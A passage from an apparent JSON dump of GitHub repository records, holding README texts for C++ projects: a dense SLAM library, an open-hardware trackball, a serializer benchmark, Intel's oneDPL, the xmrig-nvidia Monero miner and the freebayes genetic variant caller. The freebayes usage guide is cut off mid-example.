\nHaomin Liu, Chen Li, Guojun Chen, Guofeng Zhang, Michael Kaess and Hujun Bao. Robust Keyframe-based Dense SLAM with an RGB-D Camera [J]. arXiv preprint arXiv:1711.05166, 2017. [arXiv report].**[PDF](https://arxiv.org/abs/1711.05166)**. \n\n\n## 1. License\nLicensed under the Apache License, Version 2.0. \nRefer to LICENSE for more details.\n\n## 2. Prerequisites\nWe have tested the library in **Ubuntu 14.04** and **Ubuntu 16.04**. \nThe following dependencies are needed:\n### boost\nsudo apt-get install libboost-dev libboost-thread-dev libboost-filesystem-dev \n\n### Eigen\nsudo apt-get install libeigen3-dev\n\n### Glog\nhttps://github.com/google/glog\n\n### Gflags\nhttps://github.com/gflags/gflags\n\n### OpenCV\nWe use OpenCV 3.0.0. \nhttps://opencv.org/\n\n### Yaml\nhttps://github.com/jbeder/yaml-cpp\n\n### brisk\nhttps://github.com/gwli/brisk\n\n## 3. Build\ncd ice-ba \nchmod +x build.sh \n./build.sh\n\n## 4. Run\nWe provide examples to run ice-ba with the [EuRoC dataset](https://projects.asl.ethz.ch/datasets/doku.php?id=kmavvisualinertialdatasets#downloads). \n\n### run ICE-BA stereo\nRun ICE-BA in stereo mode. Please refer to scripts/run_ice_ba_stereo.sh for more details about how to run the example. \n\n### run ICE-BA monocular\nRun ICE-BA in monocular mode. Please refer to scripts/run_ice_ba_mono.sh for more details about how to run the example. \n\n### run back-end only\nFront-end results can be saved into files. Back-end only mode loads these files and runs the back-end only. \nPlease refer to scripts/run_backend_only.sh for more details about how to run the example. \n\n## 5. Contribution\nYou are very welcome to contribute to ICE-BA.\nBaidu requires contributors to e-sign a [CLA (Contributor License Agreement)](https://gist.github.com/tanzhongyibidu/6605bdef5f7bb03b9084dd8fed027037) before making a Pull Request. We have the CLA bound to GitHub, so it will pop up before you create a PR.\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "ploopyco/classic-trackball", "link": "https://github.com/ploopyco/classic-trackball", "tags": [], "stars": 656, "description": "A trackball mouse. Mechanical files, PCBs, and firmware all included.", "lang": "C++", "repo_lang": "", "readme": "# The Ploopy Trackball\n\nBy some stroke of luck, you've made your way here. The Ploopy Trackball. Your life will never be the same.\n\nThis repository contains all of the design and production files necessary to make a Ploopy Trackball. We've also included some kick-ass documentation in the Wiki on how to get it made, assemble it, and program it.\n\nWhat are you waiting for? Your new life awaits.\n\n## QMK?!\n\nAs of November 13th, 2020, kits bought from the [Ploopy store](https://ploopy.co/product-category/trackball/classic/) come with QMK preloaded. Check out the Wiki for instructions on how to load new firmware onto your device. (It's super easy!)\n\n## Under what license is this released?\n\nThe firmware is released under GPLv3. The hardware is released under OHL CERN v1.2. 
Check the respective directories for full license text.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "thekvs/cpp-serializers", "link": "https://github.com/thekvs/cpp-serializers", "tags": ["cpp", "serialization", "protobuf", "capn-proto", "thrift", "flatbuffers", "cereal", "performance-testing", "boost", "msgpack", "avro", "apache-avro", "c-plus-plus", "yas"], "stars": 656, "description": "Benchmark comparing various data serialization libraries (thrift, protobuf etc.) for C++", "lang": "C++", "repo_lang": "", "readme": "# About\n\nCompare various data serialization libraries for C++.\n\n* [Thrift](http://thrift.apache.org/)\n* [Protobuf](https://code.google.com/p/protobuf/)\n* [Boost.Serialization](http://www.boost.org/libs/serialization)\n* [Msgpack](http://msgpack.org/)\n* [Cereal](http://uscilab.github.io/cereal/index.html)\n* [Avro](http://avro.apache.org/)\n* [Capnproto](https://capnproto.org/)\n* [Flatbuffers](https://google.github.io/flatbuffers/)\n* [YAS](https://github.com/niXman/yas)\n\n# Build\n\nThis project does not have any external serialization libraries dependencies. All (boost, thrift etc.) needed libraries are downloaded and built automatically, but you need enough free disk space (approx. 2.3G) to build all components. To build this project you need a compiler that supports C++14 features. Project was tested with Clang and GCC compilers.\n\n1. `git clone https://github.com/thekvs/cpp-serializers.git`\n1. `cd cpp-serializers`\n1. `mkdir build`\n1. `cd build`\n1. `cmake -DCMAKE_BUILD_TYPE=Release ..`\n1. `cmake --build .`\n\n# Usage\n\n```\n$ ./benchmark -h\nBenchmark various C++ serializers\nUsage:\n benchmark [OPTION...]\n\n -h, --help show this help and exit\n -l, --list show list of supported serializers\n -c, --csv output in CSV format\n -i, --iterations arg number of serialize/deserialize iterations\n -s, --serializers arg comma separated list of serializers to benchmark\n```\n\n* Benchmark **all** serializers, run each serializer 100000 times:\n```\n$ ./benchmark -i 100000\n```\n* Benchmark only **protobuf** serializer, run it 100000 times:\n```\n$ ./benchmark -i 100000 -s protobuf\n```\n* Benchmark **protobuf** and **cereal** serializers only, run each of them 100000 times:\n```\n$ ./benchmark -i 100000 -s protobuf,cereal\n```\n\n# Results\n\nFollowing results were obtained running 1000000 serialize-deserialize operations 50 times and then averaging results on a typical desktop computer with Intel Core i7 processor running Ubuntu 16.04. Exact versions of libraries used are:\n\n* thrift 0.12.0\n* protobuf 3.7.0\n* boost 1.69.0\n* msgpack 3.1.1\n* cereal 1.2.2\n* avro 1.8.2\n* capnproto 0.7.0\n* flatbuffers 1.10.0\n* YAS 7.0.2\n\n| serializer | object's size | avg. total time |\n| -------------- | ------------- | --------------- |\n| thrift-binary | 17017 | 1190.22 |\n| thrift-compact | 13378 | 3474.32 |\n| protobuf | 16116 | 2312.78 |\n| boost | 17470 | 1195.04 |\n| msgpack | 13402 | 2560.6 |\n| cereal | 17416 | 1052.46 |\n| avro | 16384 | 4488.18 |\n| yas | 17416 | 302.7 |\n| yas-compact | 13321 | 2063.34 |\n\n\n## Size\n\n![Size](images/size.png)\n\n## Time\n\n![Time](images/time.png)\n\nFor capnproto and flatbuffers since they already store data in a \"serialized\" form and serialization basically means getting pointer to the internal storage, we measure full **build**/serialize/deserialize cycle. 
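\nFor the other libraries, the measurement pattern is sketched below (illustrative only, not code from this repository): the object is built once outside the timed region, and only serialize/deserialize round trips of the already built structure are timed. The `Record` type and the trivial byte-copy codec are hypothetical stand-ins for the real library calls (thrift, protobuf, etc.).\n\n```\n#include <chrono>\n#include <cstdint>\n#include <cstring>\n#include <iostream>\n#include <vector>\n\nstruct Record {\n    std::vector<int64_t> ids;  // stand-in payload\n};\n\n// Placeholder codec; a real benchmark calls the serializer under test instead.\nstatic std::vector<uint8_t> serialize(const Record& r) {\n    std::vector<uint8_t> out(r.ids.size() * sizeof(int64_t));\n    std::memcpy(out.data(), r.ids.data(), out.size());\n    return out;\n}\n\nstatic Record deserialize(const std::vector<uint8_t>& bytes) {\n    Record r;\n    r.ids.resize(bytes.size() / sizeof(int64_t));\n    std::memcpy(r.ids.data(), bytes.data(), bytes.size());\n    return r;\n}\n\nint main() {\n    Record r{std::vector<int64_t>(1000, 42)};  // built once, outside the timed loop\n    const int iterations = 100000;\n\n    const auto start = std::chrono::steady_clock::now();\n    for (int i = 0; i < iterations; ++i) {\n        Record back = deserialize(serialize(r));  // the timed round trip\n        (void)back;\n    }\n    const auto ms = std::chrono::duration_cast<std::chrono::milliseconds>(\n        std::chrono::steady_clock::now() - start).count();\n    std::cout << ms << std::endl;  // total time in milliseconds\n}\n```\n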
In the case of other libraries we measure serialize/deserialize cycle of the already built data structure.\n\n| serializer | object's size | avg. total time |\n| -------------- | ------------- | --------------- |\n| capnproto | 17768 | 400.98 |\n| flatbuffers | 17632 | 491.5 |\n\n![Time](images/time2.png)\n\nSize measured in bytes, time measured in milliseconds.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "oneapi-src/oneDPL", "link": "https://github.com/oneapi-src/oneDPL", "tags": ["oneapi"], "stars": 656, "description": "oneAPI DPC++ Library (oneDPL) https://software.intel.com/content/www/us/en/develop/tools/oneapi/components/dpc-library.html ", "lang": "C++", "repo_lang": "", "readme": "![](https://spec.oneapi.io/oneapi-logo-white-scaled.jpg)\n\noneDPL is part of [oneAPI](https://oneapi.io)\n# oneAPI DPC++ Library (oneDPL)\n\noneAPI DPC++ Library (oneDPL) works with the Intel\u00ae oneAPI DPC++/C++ Compiler to\nprovide high-productivity APIs to developers, which can minimize Data Parallel C++ (DPC++)\nprogramming efforts across devices for high performance parallel applications.\n\n## Prerequisites\nInstall the Intel\u00ae oneAPI Base Toolkit (Base Kit) to use oneDPL. Refer to the specific\n[system requirements](https://software.intel.com/content/www/us/en/develop/articles/intel-oneapi-dpcpp-system-requirements.html)\nfor more information.\n\n## Release Information\nVisit the latest [Release Notes](https://github.com/oneapi-src/oneDPL/blob/main/documentation/release_notes.rst).\n\n## License\noneDPL is licensed under [Apache License Version 2.0 with LLVM exceptions](https://github.com/oneapi-src/oneDPL/blob/release_oneDPL/licensing/LICENSE.txt).\nRefer to the [LICENSE](licensing/LICENSE.txt) file for the full license text and copyright notice.\n\n## Security\nSee the [Intel Security Center](https://www.intel.com/content/www/us/en/security-center/default.html)\nfor information on how to report a potential security issue or vulnerability.\nYou can also view the [Security Policy](SECURITY.md).\n\n## Contributing\nSee [CONTRIBUTING.md](https://github.com/oneapi-src/oneDPL/blob/release_oneDPL/CONTRIBUTING.md) for details.\n\n## Documentation\n\nSee the full documentation set for [oneDPL](https://oneapi-src.github.io/oneDPL).\n\n## Samples\nYou can find oneDPL samples at the [oneDPL Samples](https://github.com/oneapi-src/oneAPI-samples/tree/master/Libraries/oneDPL) page.\n\n## Support and Contribution\nPlease report issues and suggestions via [GitHub issues](https://github.com/oneapi-src/oneDPL/issues).\n\n------------------------------------------------------------------------\nIntel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the U.S. 
and/or other countries.\n\n\\* Other names and brands may be claimed as the property of others.", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "xmrig/xmrig-nvidia", "link": "https://github.com/xmrig/xmrig-nvidia", "tags": ["monero", "xmr", "gpu-mining", "nvidia-miner", "aeon", "xmrig", "cuda", "electroneum", "sumokoin", "cryptonight"], "stars": 655, "description": "Monero (XMR) NVIDIA miner", "lang": "C++", "repo_lang": "", "readme": "# XMRig NVIDIA\n\n[![Github All Releases](https://img.shields.io/github/downloads/xmrig/xmrig-nvidia/total.svg)](https://github.com/xmrig/xmrig-nvidia/releases)\n[![GitHub release](https://img.shields.io/github/release/xmrig/xmrig-nvidia/all.svg)](https://github.com/xmrig/xmrig-nvidia/releases)\n[![GitHub Release Date](https://img.shields.io/github/release-date-pre/xmrig/xmrig-nvidia.svg)](https://github.com/xmrig/xmrig-nvidia/releases)\n[![GitHub license](https://img.shields.io/github/license/xmrig/xmrig-nvidia.svg)](https://github.com/xmrig/xmrig-nvidia/blob/master/LICENSE)\n[![GitHub stars](https://img.shields.io/github/stars/xmrig/xmrig-nvidia.svg)](https://github.com/xmrig/xmrig-nvidia/stargazers)\n[![GitHub forks](https://img.shields.io/github/forks/xmrig/xmrig-nvidia.svg)](https://github.com/xmrig/xmrig-nvidia/network)\n\nXMRig is a high-performance Monero (XMR) NVIDIA miner with official, full Windows support.\n\nThe GPU mining part is based on [psychocrypt](https://github.com/psychocrypt)'s code used in xmr-stak-nvidia.\n\n* This is the **NVIDIA GPU** mining version; there is also a [CPU version](https://github.com/xmrig/xmrig) and an [AMD GPU version](https://github.com/xmrig/xmrig-amd).\n* [Roadmap](https://github.com/xmrig/xmrig/issues/106) for next releases.\n\n:warning: Suggested values from GPU auto-configuration may be suboptimal or may not work at all; you may need to tweak your thread options. Please feel free to open an [issue](https://github.com/xmrig/xmrig-nvidia/issues) if auto-configuration suggests wrong values.\n\n\n\n#### Table of contents\n* [Features](#features)\n* [Download](#download)\n* [Usage](#usage)\n* [Build](https://github.com/xmrig/xmrig-nvidia/wiki/Build)\n* [Donations](#donations)\n* [Release checksums](#release-checksums)\n* [Contacts](#contacts)\n\n## Features\n* High performance.\n* Official Windows support.\n* Support for backup (failover) mining server.\n* CryptoNight-Lite support for AEON.\n* Automatic GPU configuration.\n* GPU health monitoring (clocks, power, temperature, fan speed) \n* Nicehash support.\n* It's open source software.\n\n## Download\n* Binary releases: https://github.com/xmrig/xmrig-nvidia/releases\n* Git tree: https://github.com/xmrig/xmrig-nvidia.git\n * Clone with `git clone https://github.com/xmrig/xmrig-nvidia.git` :hammer: [Build instructions](https://github.com/xmrig/xmrig-nvidia/wiki/Build).\n\n## Usage\nUse [config.xmrig.com](https://config.xmrig.com/nvidia) to generate, edit or share configurations.\n\n### Command line options\n```\n -a, --algo=ALGO specify the algorithm to use\n cryptonight\n cryptonight-lite\n cryptonight-heavy\n -o, --url=URL URL of mining server\n -O, --userpass=U:P username:password pair for mining server\n -u, --user=USERNAME username for mining server\n -p, --pass=PASSWORD password for mining server\n --rig-id=ID rig identifier for pool-side statistics (needs pool support)\n -k, --keepalive send keepalived packet for prevent timeout (needs pool support)\n --nicehash enable nicehash.com support\n --tls enable SSL/TLS support (needs pool support)\n --tls-fingerprint=F pool TLS certificate fingerprint, if set enable strict certificate pinning\n -r, --retries=N number of times to retry before switch to backup server (default: 5)\n -R, --retry-pause=N time to pause between retries (default: 5)\n --cuda-devices=N list of CUDA devices to use.\n --cuda-launch=TxB list of launch config for the CryptoNight kernel\n --cuda-max-threads=N limit maximum count of GPU threads in automatic mode\n --cuda-bfactor=[0-12] run CryptoNight core kernel in smaller pieces\n --cuda-bsleep=N insert a delay of N microseconds between kernel launches\n --cuda-affinity=N affine GPU threads to a CPU\n --no-color disable colored output\n --variant algorithm PoW variant\n --donate-level=N donate level, default 5% (5 minutes in 100 minutes)\n --user-agent set custom user-agent string for pool\n -B, --background run the miner in the background\n -c, --config=FILE load a JSON-format configuration file\n -l, --log-file=FILE log all output to a file\n -S, --syslog use system log for output messages\n --print-time=N print hashrate report every N seconds\n --api-port=N port for the miner API\n --api-access-token=T access token for API\n --api-worker-id=ID custom worker-id for API\n --api-id=ID custom instance ID for API\n --api-ipv6 enable IPv6 support for API\n --api-no-restricted enable full remote access (only if API token set)\n --dry-run test configuration and exit\n -h, --help display this help and exit\n -V, --version output version information and exit\n```\n\n## Donations\nThe default donation of 5% (5 minutes in 100 minutes) can be reduced to 1% via the command line option `--donate-level`.\n\n* XMR: `48edfHu7V9Z84YzzMa6fUueoELZ9ZRXq9VetWzYGzKt52XU5xvqgzYnDK9URnRoJMk1j8nLwEVsaSWJ4fhdUyZijBGUicoD`\n* BTC: `1P7ujsXeX7GxQwHNnJsRMgAdNkFZmNVqJT`\n\n## Contacts\n* support@xmrig.com\n* [reddit](https://www.reddit.com/user/XMRig/)\n* 
[twitter](https://twitter.com/xmrig_dev)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "freebayes/freebayes", "link": "https://github.com/freebayes/freebayes", "tags": [], "stars": 655, "description": "Bayesian haplotype-based genetic polymorphism discovery and genotyping.", "lang": "C++", "repo_lang": "", "readme": "# *freebayes*, a haplotype-based variant detector\n## user manual and guide\n\n\n[![Github-CI](https://github.com/freebayes/freebayes/workflows/CI/badge.svg)](https://github.com/freebayes/freebayes/actions) [![Travis-CI](https://travis-ci.com/freebayes/freebayes.svg?branch=master)](https://travis-ci.com/freebayes/freebayes) [![AnacondaBadge](https://anaconda.org/bioconda/freebayes/badges/installer/conda.svg)](https://anaconda.org/bioconda/freebayes) [![DL](https://anaconda.org/bioconda/freebayes/badges/downloads.svg)](https://anaconda.org/bioconda/freebayes) [![BrewBadge](https://img.shields.io/badge/%F0%9F%8D%BAbrew-freebayes-brightgreen.svg)](https://github.com/brewsci/homebrew-bio) [![GuixBadge](https://img.shields.io/badge/gnuguix-freebayes-brightgreen.svg)](https://www.gnu.org/software/guix/packages/F/) [![DebianBadge](https://badges.debian.net/badges/debian/testing/freebayes/version.svg)](https://packages.debian.org/testing/freebayes) [![Chat on Matrix](https://matrix.to/img/matrix-badge.svg)](https://matrix.to/#/#vcflib:matrix.org)\n--------\n\n## Overview\n\n[*freebayes*](http://arxiv.org/abs/1207.3907) is a\n[Bayesian](http://en.wikipedia.org/wiki/Bayesian_inference) genetic variant\ndetector designed to find small polymorphisms, specifically SNPs\n(single-nucleotide polymorphisms), indels (insertions and deletions), MNPs\n(multi-nucleotide polymorphisms), and complex events (composite insertion and\nsubstitution events) smaller than the length of a short-read sequencing\nalignment.\n\n*freebayes* is haplotype-based, in the sense that it calls variants based on\nthe literal sequences of reads aligned to a particular target, not their\nprecise alignment. This model is a straightforward generalization of previous\nones (e.g. PolyBayes, samtools, GATK) which detect or report variants based on\nalignments. This method avoids one of the core problems with alignment-based\nvariant detection--- that identical sequences may have multiple possible\nalignments:\n\n\n\n*freebayes* uses short-read alignments\n([BAM](http://samtools.sourceforge.net/SAMv1.pdf) files with\n[Phred+33](http://en.wikipedia.org/wiki/Phred_quality_score) encoded quality\nscores, now standard) for any number of individuals from a population and a\n[reference genome](http://en.wikipedia.org/wiki/Reference_genome) (in\n[FASTA](http://en.wikipedia.org/wiki/FASTA_format) format)\nto determine the most-likely combination of genotypes for the population at\neach position in the reference. It reports positions which it finds putatively\npolymorphic in variant call file ([VCF](http://www.1000genomes.org/node/101))\nformat. It can also use an input set of variants (VCF) as a source of prior\ninformation, and a copy number variant map (BED) to define non-uniform ploidy\nvariation across the samples under analysis.\n\nfreebayes is maintained by Erik Garrison and Pjotr Prins. 
See also [RELEASE-NOTES](./RELEASE-NOTES.md).\n\n## Citing freebayes\n\nA preprint [Haplotype-based variant detection from short-read sequencing](http://arxiv.org/abs/1207.3907) provides an overview of the\nstatistical models used in freebayes.\nWe ask that you cite this paper if you use freebayes in work that leads to publication.\nThis preprint is used for documentation and citation.\nfreebayes was never submitted for review, but has been used in over 1000 publications.\n\nPlease use this citation format:\n\nGarrison E, Marth G. Haplotype-based variant detection from short-read sequencing. *arXiv preprint arXiv:1207.3907 [q-bio.GN]* 2012\n\nIf possible, please also refer to the version number provided by freebayes when it is run without arguments or with the `--help` option.\n\n## Install\n\nfreebayes is provided as a pre-built 64-bit static Linux binary as part of [releases](https://github.com/freebayes/freebayes/releases).\n\nDebian and Conda packages should work too, see the badges at the top\nof this page.\n\nTo build freebayes from source check the\n[development](#Development) section below. It is important to get the full recursive\ngit checkout and dependencies.\n\n## Support\n\nPlease report any issues or questions to the [freebayes mailing list](https://groups.google.com/forum/#!forum/freebayes). Report bugs on the [freebayes issue tracker](https://github.com/freebayes/freebayes/issues)\n\n## Usage\n\nIn its simplest operation, freebayes requires only two inputs: a FASTA reference sequence, and a BAM-format alignment file sorted by reference position.\nFor instance:\n\n freebayes -f ref.fa aln.bam >var.vcf\n\n... will produce a VCF file describing all SNPs, INDELs, and haplotype variants between the reference and aln.bam. The CRAM version is\n\n freebayes -f ref.fa aln.cram >var.vcf\n\nMultiple BAM files may be given for joint calling.\n\nTypically, we might consider two additional parameters.\nGVCF output allows us to have coverage information about non-called sites, and we can enable it with `--gvcf`.\nFor performance reasons we may want to skip regions of extremely high coverage in the reference using the `--skip-coverage` parameter or `-g`.\nThese can greatly increase runtime but do not produce meaningful results.\nFor instance, if we wanted to exclude regions of 1000X coverage, we would run:\n\n freebayes -f ref.fa aln.bam --gvcf -g 1000 >var.vcf\n\nFor a description of available command-line options and their defaults, run:\n\n freebayes --help\n\n## Examples\n\nCall variants assuming a diploid sample:\n\n freebayes -f ref.fa aln.bam >var.vcf\n\nCall variants on only chrQ:\n\n freebayes -f ref.fa -r chrQ aln.bam >var.vcf\n\nCall variants on only chrQ, from position 1000 to 2000:\n\n freebayes -f ref.fa -r chrQ:1000-2000 aln.bam >var.vcf\n\nRequire at least 5 supporting observations to consider a variant:\n\n freebayes -f ref.fa -C 5 aln.bam >var.vcf\n\nSkip over regions of high depth by discarding alignments overlapping positions where total read depth is greater than 200:\n\n freebayes -f ref.fa -g 200 aln.bam >var.vcf\n\nUse a different ploidy:\n\n freebayes -f ref.fa -p 4 aln.bam >var.vcf\n\nAssume a pooled sample with a known number of genome copies. Note that this\nmeans that each sample identified in the BAM file is assumed to have 32 genome\ncopies. 
When running with high --ploidy settings, it may be required to set\n`--use-best-n-alleles` to a low number to limit memory usage.\n\n freebayes -f ref.fa -p 32 --use-best-n-alleles 4 --pooled-discrete aln.bam >var.vcf\n\nGenerate frequency-based calls for all variants passing input thresholds. You'd do\nthis in the case that you didn't know the number of samples in the pool.\n\n freebayes -f ref.fa -F 0.01 -C 1 --pooled-continuous aln.bam >var.vcf\n\nUse an input VCF (bgzipped + tabix indexed) to force calls at particular alleles:\n\n freebayes -f ref.fa -@ in.vcf.gz aln.bam >var.vcf\n\nGenerate long haplotype calls over known variants:\n\n freebayes -f ref.fa --haplotype-basis-alleles in.vcf.gz \\\n --haplotype-length 50 aln.bam\n\nNaive variant calling: simply annotate observation counts of SNPs and indels:\n\n freebayes -f ref.fa --haplotype-length 0 --min-alternate-count 1 \\\n --min-alternate-fraction 0 --pooled-continuous --report-monomorphic >var.vcf\n\n## Parallelisation\n\nIn general, freebayes can be parallelised by running multiple instances of freebayes on separate regions of the genome, and then concatenating the resulting output.\nThe wrapper, [freebayes-parallel](https://github.com/ekg/freebayes/blob/master/scripts/freebayes-parallel) will perform this, using [GNU parallel](https://www.gnu.org/software/parallel/).\n\nExample freebayes-parallel operation (use 36 cores in this case):\n\n freebayes-parallel <(fasta_generate_regions.py ref.fa.fai 100000) 36 \\\n -f ref.fa aln.bam > var.vcf\n\nNote that any of the above examples can be made parallel by using the\nscripts/freebayes-parallel script. If you find freebayes to be slow, you\nshould probably be running it in parallel using this script to run on a single\nhost, or generating a series of scripts, one per region, and run them on a\ncluster. Be aware that the freebayes-parallel script contains calls to other programs using relative paths from the scripts subdirectory; the easiest way to ensure a successful run is to invoke the freebayes-parallel script from within the scripts subdirectory.\n\nA current limitation of the freebayes-parallel wrapper, is that due to variance in job memory and runtimes, some cores can go unused for long periods, as they will not move onto the next job unless all cores in use have completed their respective genome chunk. This can be partly avoided by calculating coverage of the input bam file, and splitting the genome into regions of equal coverage using the [coverage_to_regions.py script](https://github.com/freebayes/freebayes/blob/master/scripts/coverage_to_regions.py). An alternative script [split_ref_by_bai_datasize.py](https://github.com/freebayes/freebayes/blob/master/scripts/split_ref_by_bai_datasize.py) will determine target regions based on the data within multiple bam files, with the option of choosing a target data size. This is useful when submitting to Slurm and other cluster job managers, where use of resources needs to be controlled.\n\nAlternatively, users may wish to parallelise freebayes within the workflow manager [snakemake](https://snakemake.readthedocs.io/en/stable/). As snakemake automatically dispatches jobs when a core becomes available, this avoids the above issue. 
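\nWhichever dispatch mechanism is used, the underlying region decomposition is easy to picture. The following is a small illustrative sketch in C++ (a stand-in for what fasta_generate_regions.py does, not the project's actual script) that splits (contig name, contig length) pairs, as listed in a FASTA .fai index, into fixed-size chrom:start-end regions suitable for freebayes' `-r` option:\n\n    #include <algorithm>\n    #include <cstdint>\n    #include <iostream>\n    #include <string>\n    #include <utility>\n    #include <vector>\n\n    int main() {\n        // (name, length) pairs from a .fai index; the values here are illustrative\n        const std::vector<std::pair<std::string, int64_t>> contigs = {\n            {\"chr1\", 248956422}, {\"chrQ\", 250000}};\n        const int64_t chunk = 100000;  // target region size in bases\n\n        // emit one chrom:start-end region per line, each at most chunk bases wide\n        for (const auto& c : contigs)\n            for (int64_t start = 0; start < c.second; start += chunk) {\n                const int64_t end = std::min(start + chunk, c.second);\n                std::cout << c.first << ':' << start << '-' << end << std::endl;\n            }\n    }\n\nEach emitted region can then be run as an independent freebayes job and the per-region VCFs concatenated, which is the pattern the wrapper script automates.\n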
An example [.smk file](https://github.com/freebayes/freebayes/blob/master/examples/snakemake-freebayes-parallel.smk), and associated [conda environment recipe](https://github.com/freebayes/freebayes/blob/master/examples/freebayes-env.yaml), can be found in the /examples directory.\n\n## Calling variants: from fastq to VCF\n\nYou've sequenced some samples. You have a reference genome or assembled set of\ncontigs, and you'd like to determine reference-relative variants in your\nsamples. You can use freebayes to detect the variants, following these steps:\n\n* **Align** your reads to a suitable reference (e.g. with\n[bwa](http://bio-bwa.sourceforge.net/) or\n[MOSAIK](https://github.com/wanpinglee/MOSAIK))\n* Ensure your alignments have **read groups** attached so their sample may be\nidentified by freebayes. Aligners allow you to do this, but you can also use\n[bamaddrg](http://github.com/ekg/bamaddrg) to do so post-alignment.\n* **Sort** the alignments (e.g. [sambamba sort](https://github.com/biod/sambamba)).\n* **Mark duplicates**, for instance with [sambamba markdup](https://github.com/biod/sambamba) (if PCR was used in the preparation of your sequencing library)\n* ***Run freebayes*** on all your alignment data simultaneously, generating a\nVCF. The default settings should work for most use cases, but if your samples\nare not diploid, set the `--ploidy` and adjust the `--min-alternate-fraction`\nsuitably.\n* **Filter** the output e.g. using reported QUAL and/or depth (DP) or\nobservation count (AO).\n* **Interpret** your results.\n* (possibly, **Iterate** the variant detection process in response to insight\ngained from your interpretation)\n\nfreebayes emits a standard VCF 4.1 output stream. This format is designed for the\nprobabilistic description of allelic variants within a population of samples,\nbut it is equally suited to describing the probability of variation in a single\nsample.\n\nOf primary interest to most users is the QUAL field, which estimates the\nprobability that there is a polymorphism at the loci described by the record.\nIn freebayes, this value can be understood as 1 - P(locus is homozygous given\nthe data). It is recommended that users use this value to filter their\nresults, rather than accepting anything output by freebayes as ground truth.\n\nBy default, records are output even if they have very low probability of\nvariation, in expectation that the VCF will be filtered using tools such as\n[vcffilter](http://github.com/ekg/vcflib#vcffilter) in\n[vcflib](http://github.com/ekg/vcflib), which is also included in the\nrepository under `vcflib/`. For instance,\n\n freebayes -f ref.fa aln.bam | vcffilter -f \"QUAL > 20\" >results.vcf\n\nremoves any sites with estimated probability of not being polymorphic less than\nphred 20 (aka 0.01), or probability of polymorphism > 0.99.\n\nIn simulation, the [receiver-operator\ncharacteristic](https://en.wikipedia.org/wiki/Receiver_operating_characteristic)\n (ROC) tends to have a very sharp inflection between Q1 and Q30, depending on\ninput data characteristics, and a filter setting in this range should provide\ndecent performance. Users are encouraged to examine their output and both\nvariants which are retained and those they filter out. Most problems tend to\noccur in low-depth areas, and so users may wish to remove these as well, which\ncan also be done by filtering on the DP flag.\n\n\n## Calling variants in a population\n\nfreebayes is designed to be run on many individuals from the same population\n(e.g. 
many human individuals) simultaneously. The algorithm exploits a neutral\nmodel of allele diffusion to impute most-confident genotypings\nacross the entire population. In practice, the discriminant power of the\nmethod will improve if you run multiple samples simultaneously. In other\nwords, if your\nstudy has multiple individuals, you should run freebayes against them at the\nsame time. This also ensures consistent reporting of information about\nevidence for all samples at any locus where any are apparently polymorphic.\n\nTo call variants in a population of samples, each alignment must have a read\ngroup identifier attached to it (RG tag), and the header of the BAM file in\nwhich it resides must map the RG tags to sample names (SM). Furthermore, read\ngroup IDs must be unique across all the files used in the analysis. One read\ngroup cannot map to multiple samples. The reason this is required is that\nfreebayes operates on a virtually merged BAM stream provided by the BamTools\nAPI. If merging the files in your analysis using bamtools merge would generate\na file in which multiple samples map to the same RG, the files are not suitable\nfor use in population calling, and they must be modified.\n\nUsers may add RG tags to BAM files which were generated without this\ninformation by using (as mentioned in \"Calling variants\" above)\n[bamaddrg](http://github.com/ekg/bamaddrg).\nIf you have many files corresponding to\nmany individuals, add a unique read group and sample name to each, and then\nopen them all simultaneously with freebayes. The VCF output will have one\ncolumn per sample in the input.\n\n\n## Performance tuning\n\nIf you find freebayes to be slow, or use large amounts of memory, consider the\nfollowing options:\n\n- Set `--use-best-n-alleles 4`: this will reduce the number of alleles that are\n considered, which will decrease runtime at the cost of sensitivity to\nlower-frequency alleles at multiallelic loci. Calculating site qualities\nrequires O(samples\\*genotypes) runtime, and the number of genotypes is\nexponential in ploidy and the number of alleles that are considered, so this is\nvery important when working with high ploidy samples (and also\n`--pooled-discrete`). By default, freebayes puts no limit on this.\n\n- Remove `--genotype-qualities`: calculating genotype qualities requires\n O(samples\\*genotypes) memory.\n\n- Set higher input thresholds. Require that N reads in one sample support an\n allele in order to consider it: `--min-alternate-count N`, or that the allele\nfraction in one sample is M: `--min-alternate-fraction M`. This will filter\nnoisy alleles. The defaults, `--min-alternate-count 2 --min-alternate-fraction\n0.2`, are most-suitable for diploid, moderate-to-high depth samples, and should\nbe changed when working with different ploidy samples. 
Alternatively,\n`--min-alternate-qsum` can be used to set a specific quality sum, which may be\nmore flexible than setting a hard count on the number of observations.\n\n\n## Observation filters and qualities\n\n### Input filters\n\nBy default, freebayes applies almost no input filtering.\n\nfreebayes may be configured to filter its input so as to ignore low-confidence alignments and alleles which are only supported by low-quality sequencing observations (see `--min-mapping-quality` and `--min-base-quality`).\nIt will also only evaluate a position if at least one read has mapping quality of at least `--min-supporting-mapping-quality` and one allele has quality of at least `--min-supporting-base-quality`.\n\nReads with more than a fixed number of high-quality mismatches can be excluded by specifying `--read-mismatch-limit`.\nThis is meant as a workaround when mapping quality estimates are not appropriately calibrated.\n\nReads marked as duplicates in the BAM file are ignored, but this can be disabled for testing purposes by providing `--use-duplicate-reads`.\nfreebayes does not mark duplicates on its own; you must use another process to do this, such as that in [sambamba](https://github.com/biod/sambamba).\n\n### Observation thresholds\n\nAs a guard against spurious variation caused by sequencing artifacts, positions are skipped when no more than `--min-alternate-count` or `--min-alternate-fraction` non-clonal observations of an alternate are found in one sample.\nThese default to 2 and 0.05 respectively.\nThe default setting of `--min-alternate-fraction 0.05` is suitable for diploid samples but may need to be changed for higher ploidy.\n\n### Allele type exclusion\nfreebayes provides a few methods to ignore certain classes of allele, e.g.\n`--throw-away-indels-obs` and `--throw-away-mnps-obs`. Users are *strongly cautioned against using\nthese*, because removing this information is very likely to reduce detection\npower. To generate a report only including SNPs, use vcffilter post-call as\nsuch:\n\n freebayes ... | vcffilter -f \"TYPE = 